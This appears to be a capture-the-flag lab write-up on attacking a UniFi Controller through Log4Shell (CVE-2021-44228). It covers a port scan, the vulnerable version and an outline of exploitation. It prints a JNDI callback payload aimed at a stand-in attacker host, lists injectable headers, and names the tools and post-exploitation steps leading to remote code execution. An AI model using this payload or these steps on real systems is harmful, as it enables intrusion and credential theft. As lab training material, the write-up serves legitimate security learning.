Core Concept
Targeted enumeration revealed a vulnerable UniFi Controller (v6.4.54) exposed over HTTPS. The version is known to be vulnerable to Log4Shell (CVE-2021-44228), which allows remote code execution via crafted input in logging parameters.
๐น In โ Gaining Initial Foothold
๐ Target Information
- IP:
10.129.129.190 - Service: UniFi Controller
- Version:
6.4.54 - URL: https://10.129.129.190:8443
- Vulnerability: CVE-2021-44228
๐ก Full Port Scan
sudo nmap -sS -v4 -T5 -p 1-65535 10.129.129.190Results:
| Port | State | Service | Notes |
|---|---|---|---|
| 22/tcp | open | ssh | Potential for lateral movement |
| 6789/tcp | open | ibm-db2-admin | Rare โ may be misconfigured |
| 8080/tcp | open | http-proxy | Likely redirect or API |
| 8443/tcp | open | https-alt | UniFi Controller Web UI |
| 8843/tcp | open | unknown | Possible alternate web service |
| 8880/tcp | open | cddbp-alt | Custom or HTTP service |
โฃ๏ธ Vulnerability: CVE-2021-44228
Log4Shell affects Java-based applications using vulnerable versions of the Log4j library. User-controlled input that is logged can lead to:
- Remote Code Execution (RCE)
- Full system compromise
๐งช Exploitation Overview (via callback payload)
${jndi:ldap://attacker.com/exploit}Injectable fields:
- Headers (User-Agent, X-Forwarded-For)
- Form inputs, URLs, etc.
Warning
This vulnerability is critical and can be exploited remotely. It was actively used in real-world attacks after its disclosure in December 2021.
Tip
Use tools like
log4j-scanornucleito detect active injection points automatically.
๐ Next Steps
- Identify input vectors (headers, fields) in the UniFi web interface.
- Set up listener with
ldaprefserverormarshalsec. - Capture callback and deliver malicious payload for RCE.
- Post-exploitation: look for credentials, config backups, or SSH pivoting.
๐ Related Tools
- nuclei - CVE scanning
log4j-scan- Burpsuite - Manual fuzzing
ldap-ref-server- LDAP exploitation